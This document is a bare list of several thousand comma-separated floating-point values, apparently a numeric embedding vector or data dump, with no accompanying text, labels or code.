-0.031653136014938354, 0.006771945394575596, 0.012494659051299095, -0.010748610831797123, 0.01528192963451147, 0.006411522161215544, -0.005354281980544329, 0.02367577701807022, -0.01754057966172695, 0.0019823256880044937, -0.0018651883583515882, -0.03319093957543373, -0.002999519230797887, 0.007180424407124519, -0.016435282304883003, -0.0014697243459522724, 0.009923642501235008, 0.020311830565333366, 0.014953544363379478, -0.004397158976644278, -0.016026804223656654, 0.00715639628469944, -0.01074060145765543, -0.015249892137944698, -0.01923857256770134, -0.0008635130943730474, -0.002452877815812826, 0.04715932905673981, -0.027920758351683617, 0.015506193041801453, -0.03991883620619774, 0.0031657142098993063, -0.00925886258482933, 0.014921506866812706, 0.004881727509200573, -0.01170973852276802, 0.030131351202726364, -0.04677487909793854, -0.007689021062105894, 0.00397866778075695, 0.022266123443841934, -0.048056382685899734, 0.05975010246038437, -0.0016499357298016548, -0.00896251481026411, -0.029522636905312538, 0.008165580220520496, 0.015185817144811153, 0.013167448341846466, -0.012294424697756767, -0.002755232620984316, -0.0073085748590528965, 0.005250159651041031, -0.04360315576195717, 0.010660507716238499, 0.030724046751856804, -0.0391499325633049, 0.045941900461912155, -0.0156823992729187, 0.023787908256053925, -0.004086794797331095, 0.016267085447907448, -0.010908798314630985, 0.003932613879442215, 0.005946977064013481, -0.012478640303015709, -0.00456535629928112, 0.007496795617043972, 0.0341520681977272, -0.004837675951421261, 0.012014095671474934, -0.022842800244688988, 0.022057879716157913, 0.0036542874295264482, -0.025085430592298508, -0.021192865446209908, 0.0016379216685891151, -0.018085218966007233, 0.02215399220585823, -0.007697030436247587, -0.013535881415009499, -0.002356765093281865, 0.030756084248423576, 0.023483552038669586, 0.029971163719892502, -0.027680475264787674, 0.03237398341298103, 0.010812685824930668, -0.015001600608229637, -0.013071335852146149, 0.010131887160241604, -0.006844029761850834, 0.000535127823241055, -0.0018651883583515882, 0.01657945103943348, 0.0071884337812662125, -0.006347447168081999, 0.007813166826963425, 0.04888935759663582, -0.0211448073387146, -0.05773173272609711, 0.019462835043668747, 0.0018922199960798025, -0.016106897965073586, -0.02377188950777054, 0.013407730497419834, 0.011085005477070808, -0.03216573968529701, -0.009603266604244709, 0.0088583929464221, 0.03709952533245087, -0.00441718241199851, -0.014192651957273483, 0.005350277293473482, -0.0012694894103333354, -0.004845685325562954, -0.018870139494538307, 0.015658371150493622, 0.004845685325562954, -0.00314969546161592, -0.004641445353627205, 0.0015528218355029821, 0.004078785423189402, -0.0026551152113825083, 0.007656983565539122, -0.019014308229088783, -0.004661469254642725, -0.009459097869694233, 0.006335433106869459, 0.00644756481051445, -0.023531608283519745, -0.010300084948539734, 0.014096538536250591, -0.012943185865879059, -0.018213368952274323, 0.003103641327470541, 0.0357859842479229, 0.010348141193389893, -0.007733072619885206, 0.016130926087498665, -0.006251334212720394, -0.025742201134562492, 0.017444467172026634, 0.000587188929785043, 0.02532571367919445, -0.0007994379266165197, -0.02447671815752983, 0.016675565391778946, 0.0018381566042080522, -0.010796667076647282, 0.009058628231287003, 0.007604922633618116, 0.002815303159877658, -0.022218067198991776, 0.02630285918712616, -0.01414459478110075, 0.008249678649008274, 0.02338743954896927, -0.011085005477070808, 0.004024722147732973, -0.0010402204934507608, -0.026414992287755013, 0.03256620839238167, 0.003586207516491413, 0.017604654654860497, -0.014873450621962547, 0.01031610369682312, -0.009218815714120865, -0.014833403751254082, -0.013583937659859657, 0.004553342238068581, 0.0019232564372941852, -0.0038405058439821005, 0.02545386366546154, 0.03370354324579239, -0.008505979552865028, 0.009867576882243156, -0.0005221125902608037, 0.022986968979239464, -0.03267833963036537, 0.0327584333717823, 0.000021024667148594745, -0.02080841362476349, -0.02076035737991333, -0.0055304886773228645, -0.0009335953509435058, -0.025902390480041504, 0.0088583929464221, -0.004216947592794895, -0.030003201216459274, 0.031188592314720154, -0.029794957488775253, 0.009515163488686085, -0.03222981467843056, 0.018085218966007233, -0.013199485838413239, -0.008666167967021465, -0.020616188645362854, 0.030211444944143295, -0.00731658423319459, 0.034696709364652634, -0.02973088249564171, -0.008401857689023018, -0.013872276060283184, -0.011597607284784317, -0.026414992287755013, 0.00745274405926466, -0.005166061222553253, 0.009947671554982662, -0.02109675109386444, 0.00401671277359128, -0.04520503804087639, -0.0120541425421834, 0.020744338631629944, 0.00045728651457466185, 0.009018581360578537, -0.018021143972873688, -0.015802539885044098, -0.014753309078514576, 0.01245461218059063, -0.004817652516067028, -0.016723621636629105, 0.026062577962875366, 0.0016999945510178804, -0.013127401471138, 0.00641552684828639, -0.03709952533245087, 0.024877186864614487, 0.005238145589828491, -0.0076489741913974285, -0.0285775288939476, -0.019799228757619858, 0.008049444295465946, -0.014344830065965652, -0.007396677974611521, 0.023403458297252655, 0.03242203965783119, 0.013383702374994755, -0.011853907257318497, 0.021337034180760384, 0.028913922607898712, 0.007328598294407129, -0.002464891877025366, 0.023691795766353607, -0.007849209010601044, 0.0035381510388106108, -0.012959204614162445, -0.0016559428768232465, 0.016755659133195877, -0.005806813016533852, 0.01532998587936163, 0.021769540384411812, 0.02168944664299488, 0.019478853791952133, -0.005922948941588402, -0.0120541425421834, -0.032406020909547806, 0.013519861735403538, 0.020648226141929626, -0.017396410927176476, -0.01528192963451147, 0.019254591315984726, 0.009707389399409294, 0.011821869760751724, 0.028849847614765167, 0.011853907257318497, -0.01101292110979557, 0.012718922458589077, -0.01750854216516018, 0.010748610831797123, -0.04639042913913727, -0.020279793068766594, 0.01776484213769436, 0.04430798441171646, -0.0032398011535406113, -0.010067812167108059, -0.007741081994026899, -0.02168944664299488, -0.03408799320459366, 0.005942972376942635, 0.01183788850903511, 0.016050832346081734, -0.006191263906657696, 0.03195749595761299, -0.0001354088744847104, 0.0350811593234539, -0.001462716143578291, -0.022186029702425003, 0.0062112873420119286, -0.009138721972703934, -0.016058841720223427, 0.026927592232823372, 0.005622596479952335, -0.0034039937891066074, -0.02630285918712616, 0.013159438967704773, 0.002066424349322915, -0.001489747897721827, -0.00934696663171053, 0.016883809119462967, 0.01412056665867567, 0.025133488699793816, 0.023115118965506554, -0.00641552684828639, -0.02490922436118126, 0.01342374924570322, -0.015394060872495174, 0.002993512200191617, -0.008714224211871624, 0.04097607359290123, -0.0055304886773228645, -0.03344724327325821, -0.013816209509968758, -0.02148120291531086, 0.03889363259077072, 0.009491135366261005, 0.03138081729412079, -0.026318877935409546, -0.01619500108063221, -0.009499144740402699, 0.0015848594484850764, -0.011101024225354195, 0.0008274708525277674, -0.015097713097929955, -0.02325928956270218, -0.03208564594388008, 0.0028693664353340864, -0.010219990275800228, -0.010996902361512184, 0.028096964582800865, 0.038413066416978836, -0.02785668335855007, -0.028177058324217796, -0.008217641152441502, -0.017492523416876793, -0.010988892987370491, 0.007668997626751661, 0.00471353018656373, 0.015442117117345333, -0.0034480453468859196, 0.026334896683692932, -0.0025590022560209036, 0.02498931810259819, -0.021753521636128426, 0.04084792360663414, -0.018021143972873688, -0.00414486275985837, 0.01374412514269352, -0.019414778798818588, -0.013095363974571228, -0.00201436341740191, 0.025341732427477837, 0.008794317953288555, -0.017732804641127586, -0.0028133008163422346, -0.009507154114544392, 0.007765110582113266, 0.0019693104550242424, 0.012630819343030453, -0.0055945636704564095, 0.004192919470369816, 0.02393207885324955, 0.012911148369312286, -0.015826568007469177, 0.015001600608229637, 0.010668517090380192, 0.005618591792881489, 0.022554462775588036, 0.010660507716238499, -0.008610101416707039, 0.0018211366841569543, 0.01520183589309454, 0.019078383222222328, -0.0033078810665756464, -0.011869926005601883, -0.026959629729390144, -0.00008947998139774427, 0.03335113078355789, 0.007576889358460903, -0.021080732345581055, -0.013247543014585972, -0.012070161290466785, 0.001844163634814322, -0.008994553238153458, -0.026527123525738716, 0.006675832439213991, 0.008189608342945576, -0.008001388050615788, -0.00961928628385067, -0.01103694923222065, -0.017989106476306915, 0.007881246507167816, 0.008377829566597939, -0.007420706562697887, -0.004256994463503361, 0.002172549022361636, -0.023019006475806236, 0.0013595951022580266, 0.03035561554133892, 0.004709525499492884, -0.004094804171472788, 0.02583831548690796, -0.022970950230956078, 0.014088529162108898, 0.038381028920412064, 0.004457229282706976, -0.003023547353222966, -0.026991667225956917, -0.013944360427558422, -0.011133061721920967, -0.0018691930454224348, 0.01086875144392252, -0.021801577880978584, 0.00571870943531394, 0.001643928699195385, 0.021641390398144722, -0.0006432547233998775, -0.01965506002306938, 0.0066077527590096, 0.0040207174606621265, -0.015289939008653164, 0.007416701875627041, 0.012807025574147701, -0.024204397574067116, 0.003888562321662903, 0.010908798314630985, 0.0191104207187891, 0.00731658423319459, -0.030051257461309433, 0.0073446170426905155, -0.012734941206872463, 0.004228961654007435, 0.006375479977577925, 0.006936138030141592, 0.02269863151013851, -0.0001384123897878453, 0.014344830065965652, 0.03703545033931732, 0.02811298333108425, 0.010628470219671726, -0.0033319091890007257, -0.00013916326861362904, -0.01503363810479641, -0.029282355681061745, -0.01754057966172695, -0.007697030436247587, -0.020568132400512695, 0.0062032779678702354, -0.0009901616722345352, -0.029826994985342026, -0.0197511725127697, 0.008986543864011765, -0.022762706503272057, -0.025021355599164963, 0.007460753433406353, 0.03272639587521553, -0.00672388868406415, -0.01983126625418663, 0.020391924306750298, 0.0035822028294205666, 0.016331160441040993, 0.008465932682156563, -0.026447029784321785, 0.017556598410010338, 0.04177701473236084, -0.02152925916016102, 0.010980883613228798, 0.021192865446209908, 0.005130018573254347, 0.02266659401357174, -0.025389788672327995, 0.023787908256053925, 0.019510891288518906, -0.0006963169435039163, 0.02731204405426979, -0.008914458565413952, -0.008626120164990425, 0.028048908337950706, 0.029330411925911903, 0.015466145239770412, -0.007917288690805435, 0.0015878629637882113, -0.01611490733921528, -0.003890564665198326, 0.009803501889109612, -0.00755686592310667, 0.0030776108615100384, -0.021593334153294563, -0.017860954627394676, 0.017876973375678062, 0.009883595630526543, 0.00745274405926466, 0.03256620839238167, -0.012718922458589077, 0.04030328616499901, 0.03745194151997566, 0.0004565356357488781, -0.04773600772023201, -0.029955144971609116, -0.008145556785166264, -0.005482432432472706, 0.00013553402095567435, -0.02731204405426979, 0.029186243191361427, 0.0030716038309037685, -0.0035802004858851433, -0.0001195777949760668, 0.025005336850881577, 0.012190301902592182, -0.016515376046299934, -0.006383489351719618, -0.012254377827048302, -0.03770824149250984, 0.017220202833414078, 0.004437205847352743, -0.024380603805184364, 0.003976665437221527, 0.018373556435108185, -0.025822296738624573, 0.01810123771429062, 0.015297948382794857, 0.013704078271985054, -0.013199485838413239, -0.01243058405816555, 0.0023207226768136024, -0.016034813597798347, 0.00502189202234149, -0.0006177247269079089, 0.010436244308948517, -0.004821657203137875, -0.009194787591695786, 0.009459097869694233, 0.02511746995151043, -0.0003614240267779678, 0.02587035298347473, -0.019126439467072487, 0.013439767993986607, -0.01259878184646368, 0.013231524266302586, -0.03053182177245617, 0.0016048828838393092, -0.011789832264184952, -0.00031712205964140594, 0.005766765680164099, 0.049530111253261566, -0.01895023323595524, -0.013880285434424877, -0.0005376307526603341, -0.028977997601032257, -0.0059349630028009415, 0.022186029702425003, 0.004621421918272972, -0.0022726664319634438, -0.020071549341082573, 0.00715639628469944, -0.0003248811699450016, 0.017156127840280533, 0.0018351530889049172, 0.00029509622254408896, 0.0200395118445158, -0.023451514542102814, -0.010107859037816525, 0.010372169315814972, 0.016026804223656654, -0.019590985029935837, 0.007476772181689739, 0.002673136303201318, -0.015241882763803005, -0.0005206108326092362, 0.007849209010601044, -0.0177167858928442, 0.00041273425449617207, -0.004265003837645054, 0.02968282625079155, -0.007412696722894907, -0.00033264028024859726, -0.005498451180756092, 0.005754751618951559, 0.02080841362476349, 0.0472874790430069, -0.021112769842147827, -0.007280542049556971, 0.0006257341592572629, -0.013880285434424877, -0.0069201188161969185, -0.003570188768208027, -0.009651323780417442, 0.022089917212724686, -0.0008379831560887396, -0.013383702374994755, 0.014152604155242443, -0.01331962738186121, 0.024684961885213852, -0.00003052018291782588, -0.0038244870956987143, -0.006199273280799389, 0.021593334153294563, -0.012694894336163998, -0.02093656361103058, 0.019174495711922646, -0.015802539885044098, -0.012062151916325092, 0.011693719774484634, -0.032966677099466324, -0.01283105369657278, -0.005490441806614399, -0.006936138030141592, -0.007689021062105894, -0.006900095380842686, 0.0037443931214511395, 0.007628950756043196, 0.05331054702401161, -0.0016319146379828453, -0.020952582359313965, -0.016138935461640358, -0.008281716145575047, -0.008409867063164711, 0.022714650258421898, 0.018934214487671852, -0.009739426895976067, -0.02684749849140644, 0.005202103406190872, -0.0023727838415652514, -0.001997343497350812, -0.017188165336847305, -0.0020403938833624125, -0.033927805721759796, 0.03492097184062004, 0.008546026423573494, -0.03107646107673645, 0.003828491782769561, -0.012943185865879059, 0.008101505227386951, 0.015570268034934998, -0.0036703061778098345, 0.006127188913524151, 0.000644756481051445, -0.022250104695558548, -0.04469243437051773, 0.0160908792167902, 0.018341518938541412, -0.03341520577669144, -0.013760143890976906, -0.015346004627645016, -0.0072725326754152775, 0.01570642739534378, -0.013623984530568123, 0.025854334235191345, -0.03195749595761299, 0.008273706771433353, 0.003347927937284112, -0.0004610409087035805, -0.013071335852146149, 0.0065076351165771484, -0.016755659133195877, 0.018197350203990936, 0.005682667251676321, -0.004909760318696499, -0.011469456367194653, 0.019350703805685043, 0.02511746995151043, 0.002673136303201318, 0.004152872134000063, -0.025133488699793816, 0.009587247855961323, -0.02233019843697548, -0.001577851246111095, 0.0009601264609955251, -0.0037383860908448696, -0.01895023323595524, -0.030051257461309433, 0.006639790255576372, -0.0016639522509649396, 0.013247543014585972, 0.013784172013401985, -0.0052902065217494965, 0.010884770192205906, -0.01859782077372074, -0.011405381374061108, 0.005470418371260166, -0.01388829480856657, 0.012270396575331688, -0.004200928844511509, 0.017188165336847305, 0.02011960558593273, -0.028321227058768272, 0.02063220739364624, 0.034856896847486496, 0.0027011691126972437, -0.010091840289533138, 0.009234834462404251, 0.0024208403192460537, 0.012686884962022305, -0.014793355949223042, -0.0015438112895935774, -0.01898227073252201, 0.012230349704623222, 0.025437844917178154, 0.00934696663171053, 0.020055530592799187, 0.0048136478289961815, 0.005814822390675545, -0.02008756808936596, 0.01903032697737217, -0.010260037146508694, -0.0024208403192460537, 0.003802461316809058, -0.013776162639260292, 0.006275362800806761, 0.010788657702505589, -0.005294211208820343, 0.005266178399324417, -0.006155221723020077, 0.01215826440602541, -0.003694334300234914, 0.016026804223656654, -0.020744338631629944, 0.004585379734635353, -0.01143741887062788, -0.028064927086234093, 0.024540793150663376, 0.026959629729390144, 0.0074567487463355064, 0.024380603805184364, -0.02748825028538704, -0.011982058174908161, 0.005202103406190872, 0.006511639803647995, -0.013575928285717964, 0.004829666577279568, 0.0024789082817733288, -0.012887120246887207, 0.002554997568950057, 0.007873237133026123, 0.017284279689192772, -0.002510946011170745, -0.014617149718105793, -0.018165312707424164, 0.005194094032049179, 0.0035281393211334944, 0.025549976155161858, -0.012070161290466785, 0.03040367178618908, -0.015866614878177643, -0.0020373903680592775, 0.01738039217889309, 0.0322938896715641, 0.009395022876560688, 0.02308308146893978, 0.012094189412891865, 0.013255552388727665, -0.002348755719140172, -0.03931012004613876, 0.038124728947877884, -0.021849635988473892, -0.01957496628165245, 0.020776376128196716, 0.0030255496967583895, -0.021465184167027473, 0.0016519381897524, 0.008802327327430248, 0.003103641327470541, 0.03818880394101143, 0.01987932249903679, -0.012078170664608479, 0.021256940439343452, 0.0027151855174452066, -0.0105724036693573, -0.030932290479540825, 0.00009817769023356959, -0.006615762133151293, -0.015850596129894257, -0.007781129330396652, -0.00022839296434540302, -0.008898439817130566, 0.001067252131178975, -0.0037043460179120302, -0.007472767494618893, 0.0048496900126338005, -0.012574753724038601, 0.011004911735653877, 0.006615762133151293, -0.0017840932123363018, 0.013776162639260292, -0.02341947704553604, -0.00042850273894146085, 0.004937793128192425, 0.027840664610266685, 0.011149080470204353, 0.013800190761685371, 0.021545277908444405, -0.012494659051299095, 0.012710913084447384, 0.00228267814964056, 0.004449219908565283, -0.02249038591980934, -0.008746261708438396, -0.028977997601032257, 0.008197617717087269, -0.009338957257568836, 0.01869393326342106, -0.002913418225944042, -0.01848568767309189, 0.00015242883819155395, -0.0036022262647747993, -0.003035561414435506, 0.0020464009139686823, 0.002831321908161044, 0.01200608629733324, -0.0034100008197128773, -0.005614587105810642, 0.01606685109436512, 0.0038264894392341375, -0.01923857256770134, 0.0054944464936852455, 0.0029835004825145006, -0.0025569999124854803, -0.013231524266302586, 0.005666648503392935, -0.009923642501235008, -0.0034840877633541822, 0.0011944012949243188, -0.012278405949473381, 0.007172415032982826, 0.002831321908161044, -0.0017610661452636123, 0.011285240761935711, 0.0028213101904839277, 0.005246154963970184, -0.019799228757619858, -0.026495086029171944, -0.007080306764692068, 0.007260518614202738, 0.014320801943540573, 0.0032638292759656906, 0.00200835638679564, -0.0025950446724891663, 0.010964864864945412, 0.003183735301718116, -0.01766872964799404, -0.012518687173724174, -0.002280675806105137, 0.003355937311425805, 0.0027792607434093952, 0.01604282297194004, -0.00486170407384634, -0.01517780777066946, -0.016435282304883003, -0.0016519381897524, -0.020279793068766594, -0.0016679569380357862, 0.022394273430109024, 0.001918250578455627, -0.0009836540557444096, 0.004761586431413889, 0.01458511222153902, -0.005474423058331013, -0.002933441661298275, 0.0010091840522363782, 0.004074780736118555, 0.0060270712710917, 0.0002965979801956564, 0.007536842487752438, 0.009811511263251305, -0.015738464891910553, -0.00042324658716097474, -0.004124839324504137, -0.0034320265986025333, 0.008449913933873177, -0.015233873389661312, 0.016483338549733162, 0.0026691316161304712, 0.025678126141428947, 0.0011373343877494335, 0.005806813016533852, -0.019526910036802292, -0.0006332429475151002, -0.010972874239087105, 0.0020343868527561426, -0.006940142717212439, -0.00082346610724926, 0.005266178399324417, -0.004549337550997734, -0.006131193600594997, 0.002268661744892597, 0.01570642739534378, 0.008281716145575047, -0.0018762012477964163, 0.009146731346845627, 0.006263348273932934, 0.018245406448841095, 0.020279793068766594, -0.011637654155492783, -0.0072725326754152775, -0.010796667076647282, 0.03719564154744148, 0.004677488002926111, 0.008425885811448097, -0.00033714555320329964, -0.029154205694794655, 0.012847072444856167, 0.011429409496486187, -0.019046345725655556, -0.0029234299436211586, -0.00672388868406415, -0.008189608342945576, -0.004054757300764322, -0.011189127340912819, -0.013391711749136448, 0.0019472846761345863, 0.023835966363549232, 0.010540366172790527, 0.0054944464936852455, -0.013607965782284737, -0.0027892724610865116, -0.002072431379929185, 0.005754751618951559, 0.00585486926138401, -0.020135624334216118, -0.006231310777366161, 0.012462621554732323, 0.010884770192205906, -0.005778779741376638, 0.028145020827651024, 0.01374412514269352, -0.009523172862827778, -0.008249678649008274, -0.025053393095731735, 0.0034640643279999495, 0.016499357298016548, 0.016515376046299934, 0.003518127603456378, 0.01792502962052822, 0.002154527697712183, -0.004421187099069357, 0.014777337200939655, 0.007801152765750885, -0.013103373348712921, -0.028769753873348236, 0.007973354309797287, 0.006387494038790464, -0.010620460845530033, 0.007228480651974678, -0.005250159651041031, 0.0065156444907188416, 0.008842374198138714, -0.009467107243835926, 0.01361597515642643, -0.005991029087454081, -0.01557827740907669, 0.006511639803647995, 0.009098675101995468, 0.000518608430866152, -0.004669478628784418, -0.009907623752951622, -0.006715879309922457, 0.03303075209259987, -0.01046828180551529, -0.013399721123278141, 0.004212942905724049, -0.001341574010439217, 0.005922948941588402, 0.002039392711594701, -0.006315409671515226, -0.0011123049771413207, 0.05161255598068237, -0.02697564847767353, -0.013431758619844913, -0.008113519288599491, 0.0058348458260297775, 0.013007260859012604, -0.0020043516997247934, 0.013135410845279694, 0.00011457192158559337, -0.023179195821285248, -0.01416862290352583, -0.007789138704538345, 0.0013926338870078325, -0.005278192460536957, -0.011621635407209396, 0.027392137795686722, -0.0019522905349731445, 0.007000213023275137, -0.00018909685604739934, 0.0029314393177628517, -0.009771464392542839, 0.027344081550836563, -0.005386319477111101, 0.014593121595680714, 0.00934696663171053, -0.00042199509334750473, 0.01882208324968815, 0.011341306380927563, -0.00357819814234972, 0.023916060104966164, 0.012815034948289394, -0.011101024225354195, 0.009547200985252857, 0.010211980901658535, 0.030579878017306328, 0.002036389196291566, 0.007572884671390057, 0.006972180213779211, 0.00715639628469944, -0.024044210091233253, -0.020616188645362854, 0.00045127945486456156, 0.0036342639941722155, -0.007256513927131891, -0.010075821541249752, 0.02553395740687847, 0.008385838940739632, 0.009883595630526543, -0.008073472417891026, -0.0010832709958776832, 0.0005023393896408379, 0.009074646979570389, -0.01517780777066946, 0.000831475539598614, 0.009354976005852222, -0.0064315455965697765, -0.002490922575816512, 0.013087354600429535, 0.0004317565471865237, 0.0041688913479447365, -0.03725971654057503, -0.013055317103862762, 0.028529472649097443, -0.009955680929124355, -0.011845897883176804, 0.015554249286651611, -0.011597607284784317, -0.02215399220585823, -0.008241669274866581, 0.016595469787716866, -0.0043250746093690395, 0.015185817144811153, -0.013648012652993202, -0.011373343877494335, -0.0026310868561267853, 0.02359568327665329, -0.0024428660981357098, 0.011765804141759872, -0.002538978820666671, 0.005922948941588402, -0.003177728271111846, 0.0024348567239940166, -0.010876760818064213, 0.0029674815014004707, 0.017909010872244835, 0.0043130600824952126, 0.024877186864614487, -0.01283105369657278, -0.01604282297194004, -0.016082869842648506, 0.003295866772532463, -0.0027392138727009296, -0.008305744268000126, 0.0014767325483262539, 0.018085218966007233, 0.019334685057401657, 0.032870564609766006, 0.011277231387794018, 0.01175779476761818, -0.00002529530320316553, 0.012206320650875568, 0.036811187863349915, -0.020824432373046875, -0.013087354600429535, -0.0014446949353441596, 0.019478853791952133, 0.018709952011704445, 0.005770770367234945, 0.018277443945407867, -0.013183467090129852, 0.01843763142824173, -0.020504055544734, -0.0012855082750320435, 0.014360848814249039, 0.01944681629538536, 0.003674310864880681, -0.0045893844217062, 0.0021665419917553663, 0.016138935461640358, 0.01848568767309189, -0.010540366172790527, 0.0006287376745603979, -0.012398546561598778, 0.019863303750753403, 0.0114133907482028, 0.011725757271051407, 0.01154154073446989, 0.019943399354815483, -0.0010226998711004853, 0.023403458297252655, -0.010756620205938816, 0.00200835638679564, -0.02338743954896927, -0.007777124643325806, -0.014344830065965652, -0.028129002079367638, -0.0015438112895935774, 0.02591840922832489, -0.01601879484951496, 0.004913765005767345, -0.02406022883951664, -0.0010382180335000157, -0.02844937890768051, 0.011821869760751724, -0.0018501706654205918, -0.0029174229130148888, 0.010644488967955112, -0.011597607284784317, 0.017396410927176476, 0.027680475264787674, 0.016691584140062332, -0.005902925506234169, 0.0026911573950201273, 0.03341520577669144, 0.004773600492626429, 0.022137973457574844, 0.007332602981477976, 0.010940836742520332, 0.006811992265284061, -0.011517512612044811, -0.010260037146508694, -0.004321069922298193, 0.0008224649354815483, 0.002993512200191617, 0.00800939742475748, -0.016130926087498665, -0.026270821690559387, -0.02377188950777054, 0.0036342639941722155, 0.005298216361552477, 0.013135410845279694, 0.01520183589309454, -0.009122703224420547, 0.003532144008204341, 0.012654847465455532, 0.013199485838413239, 0.0186458770185709, -0.02723195031285286, -0.008706214837729931, -0.008970525115728378, -0.010244018398225307, -0.011717747896909714, 0.00888242106884718, 0.017572617158293724, -0.011189127340912819, 0.0023747861851006746, -0.02803288958966732, 0.025758221745491028, 0.017268259078264236, 0.014352839440107346, -0.0022486383095383644, -0.00401671277359128, 0.019943399354815483, -0.0016319146379828453, -0.007448739372193813, -0.007320588920265436, 0.00805745366960764, -0.005950982216745615, -0.0026190727949142456, 0.015674389898777008, -0.009491135366261005, -0.025005336850881577, -0.02101665735244751, -0.0018872141372412443, -0.0022266122978180647, -0.024460699409246445, -0.0005386319244280457, -0.003361944342032075, 0.00009160747868008912, -0.021705465391278267, -0.0069201188161969185, -0.004489267244935036, 0.012078170664608479, -0.006215292029082775, -0.02008756808936596, -0.0011093014618381858, 0.0007799150189384818, -0.010588422417640686, -0.008297734893858433, 0.006631780881434679, -0.030964327976107597, 0.0076850163750350475, -0.015554249286651611, -0.01412056665867567, 0.004421187099069357, 0.007901269942522049, 0.017989106476306915, 0.0004447718383744359, 0.0007979361689649522, -0.005626601632684469, -0.006215292029082775, 0.009491135366261005, 0.018069200217723846, -0.013760143890976906, 0.008794317953288555, -0.002879378153011203, 0.011685710400342941, 0.01541007962077856, 0.0009476118138991296, -0.007560870610177517, 0.008313754573464394, 0.00429303664714098, -0.010540366172790527, -0.0026030540466308594, -0.017492523416876793, 0.03056385926902294, 0.003598221577703953, -0.03250213339924812, -0.018918195739388466, -0.0004249986377544701, -0.015866614878177643, -0.010644488967955112, 0.010003737173974514, 0.004044745583087206, 0.001440690248273313, -0.03991883620619774, 0.018806064501404762, 0.0033138880971819162, 0.015209845267236233, 0.02816103957593441, 0.01530595775693655, -0.0066077527590096, 0.002490922575816512, -0.01991136185824871, -0.010003737173974514, -0.005670653190463781, -0.013383702374994755, 0.025806277990341187, -0.00615121703594923, -0.005590558983385563, 0.004397158976644278, 0.009755445644259453, 0.004561351612210274, -0.015530221164226532, 0.005690676625818014, 0.019094401970505714, 0.0163231510668993, -0.0015798535896465182, 0.005534493364393711, 0.0016178982332348824, 0.0028032888658344746, -0.019062364473938942, 0.02426847256720066, 0.0008379831560887396, 0.022682612761855125, 0.024252453818917274, -0.023195214569568634, 0.01704399660229683, 0.008141552098095417, 0.011277231387794018, 0.004188914783298969, -0.003718362655490637, -0.0007493792218156159, -0.02233019843697548, 0.005089971702545881, 0.006475597620010376, -0.003083617892116308, -0.00018746995192486793, 0.030323578044772148, -0.010540366172790527, 0.02596646547317505, 0.007376654539257288, -0.004012708086520433, 0.019542928785085678, 0.004184910096228123, 0.032069627195596695, -0.01116509921848774, 0.009779473766684532, 0.009795492514967918, -0.019222551956772804, -0.003125667106360197, -0.010580413043498993, 0.01124519295990467, -0.018341518938541412, -0.017412429675459862, -0.004224956966936588, -0.013439767993986607, -0.032325927168130875, -0.0014547067694365978, -0.011853907257318497, -0.0061752451583743095, 0.024684961885213852, 0.0030876225791871548, 0.008690196089446545, -0.04004698619246483, 0.007364640478044748, -0.025726182386279106, 0.018998289480805397, 0.021593334153294563, 0.02867364138364792, 0.012278405949473381, 0.004481257405132055, 0.014553074724972248, 0.009707389399409294, 0.0005033405614085495, 0.0069681755267083645, -0.010083830915391445, 0.011645663529634476, -0.002769249025732279, 0.007540847174823284, -0.007036255206912756, -0.011277231387794018, 0.012126226909458637, -0.007817171514034271, 0.02571016363799572, 0.012510677799582481, 0.0007754097459837794, -0.03479282185435295, -0.001473729033023119, 0.006763936020433903, -0.03424818068742752, -0.0018291460582986474, 0.0007438727770932019, -0.006547681987285614, 0.0008049444295465946, -0.012086180038750172, -0.029666807502508163, 0.001459712628275156, 0.004505285993218422, 0.027504269033670425, 0.008594082668423653, 0.020183680579066277, -0.00005431372483144514, 0.018870139494538307, -0.016755659133195877, -0.007012227084487677, -0.007813166826963425, -0.01882208324968815, 0.011229174211621284, 0.008570054545998573, -0.0064796023070812225, -0.007468762807548046, 0.025085430592298508, -0.024380603805184364, -0.0013836233410984278, -0.00031461913022212684, 0.0183575376868248, -0.014857431873679161, -0.0060911462642252445, 0.02037590555846691, -0.008305744268000126, -0.008954505436122417, 0.0009966692887246609, -0.006952156778424978, -0.003784439992159605, -0.015337995253503323, 0.021801577880978584, -0.006411522161215544, -0.023691795766353607, 0.01686779037117958, -0.011221164837479591, -0.010396197438240051, 0.01302327960729599, 0.024428660050034523, 0.0002910915354732424, 0.003147693118080497, -0.019430797547101974, 0.005674657877534628, -0.002911415882408619, -0.008722233586013317, 0.007508809678256512, 0.015057666227221489, 0.0031016389839351177, -0.009811511263251305, 0.022570481523871422, 0.009186778217554092, -0.007640964817255735, -0.015249892137944698, 0.030900252982974052, -0.0046094078570604324, 0.016547413542866707, 0.0014647184871137142, 0.0028493429999798536, -0.004128844011574984, 0.02063220739364624, -0.007552861236035824, 0.006343442481011152, -0.0006797975511290133, -0.028321227058768272, 0.016130926087498665, 0.019719135016202927, 0.01183788850903511, -0.017108071595430374, -0.013623984530568123, -0.0033839703537523746, -0.003992684185504913, -0.0024568825028836727, 0.035369496792554855, 0.006215292029082775, 0.015394060872495174, 0.0008174590766429901, -0.016947884112596512, 0.014072510413825512, -0.007857218384742737, -0.011052967980504036, 0.013543890789151192, -0.004252989776432514, -0.021048694849014282, 0.003942625597119331, 0.009098675101995468, 0.005342267919331789, 0.021112769842147827, -0.00471353018656373, 0.0022626547142863274, 0.003922602161765099, -0.0076489741913974285, -0.014545065350830555, 0.01859782077372074, -0.010972874239087105, 0.031781286001205444, 0.0065156444907188416, -0.009971699677407742, 0.0071523915976285934, 0.01162964478135109, 0.014857431873679161, -0.0016459310427308083, -0.00444121053442359, -0.0180051252245903, -0.010452263057231903, -0.002200581831857562, 0.003830494126304984, 0.026190727949142456, 0.006067118141800165, 0.008810336701571941, -0.001103294431231916, -0.005278192460536957, 0.011934001930058002, 0.020279793068766594, 0.021369071677327156, 0.015233873389661312, -0.027552325278520584, -0.0024548801593482494, 0.009194787591695786, -0.0006417529075406492, -0.0036362663377076387, -0.005081962328404188, -0.0019052353454753757, 0.01779687963426113, 0.015674389898777008, -0.0022626547142863274, -0.022346217185258865, 0.010372169315814972, -0.00558254960924387, -0.020439980551600456, -0.004641445353627205, -0.00315570249222219, 0.005057934205979109, -0.006247329525649548, -0.00444121053442359, 0.021721484139561653, -0.005975010339170694, 0.007296560797840357, -0.004212942905724049, 0.01686779037117958, -0.012294424697756767, 0.01978321000933647, -0.04312259331345558, -0.0180051252245903, 0.021256940439343452, -0.02029581181704998, -0.008626120164990425, -0.024893205612897873, -0.021721484139561653, -0.003259824588894844, 0.002817305503413081, -0.011453437618911266, -0.02524561993777752, -0.0053102304227650166, -0.029859032481908798, 0.012270396575331688, 